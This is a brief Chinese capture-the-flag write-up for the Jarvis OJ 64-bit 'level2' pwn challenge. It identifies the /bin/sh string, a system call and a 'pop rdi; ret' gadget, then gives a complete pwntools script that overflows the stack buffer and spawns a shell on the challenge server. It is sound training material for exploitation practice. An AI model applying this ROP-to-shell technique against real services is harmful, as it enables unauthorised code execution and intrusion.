Jarvis OJ [XMAN]level2(x64)

liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64
[*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

只开启了NX保护，64位的系统

data:0000000000600A90 hint            db '/bin/sh',0

有/bin/sh字符串

text:000000000040063E                 call    _system

有call system
为了让它们连接到一起需要给system函数传递参数要用到ROP用程序自带的内容实现一些不可告人的操作。

当参数少于7个时， 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。所以我们要想办法向rdi里面写入参数

liu@liu-F117-F:~/桌面/oj/level2_x64$ ROPgadget --binary level2_x64 --only "pop|ret"|grep rdi
0x00000000004006b3 : pop rdi ; ret

运气不错，搜索到了。

from pwn import *


system_addr=0x000000000040063E
poprdi_drt=0x00000000004006b3
binsh_addr=0x0000000000600A90
p=remote("pwn2.jarvisoj.com",9882)
p.recvline()
payload='A'*0x80+"A"*8+p64(poprdi_drt)+p64(binsh_addr)+p64(system_addr)
p.send(payload)
p.interactive()

这里重要的是payload的构造。相比起来32位略显不好控制。不过只要控制住pop传参，传完之后rbp的位置，就能pwn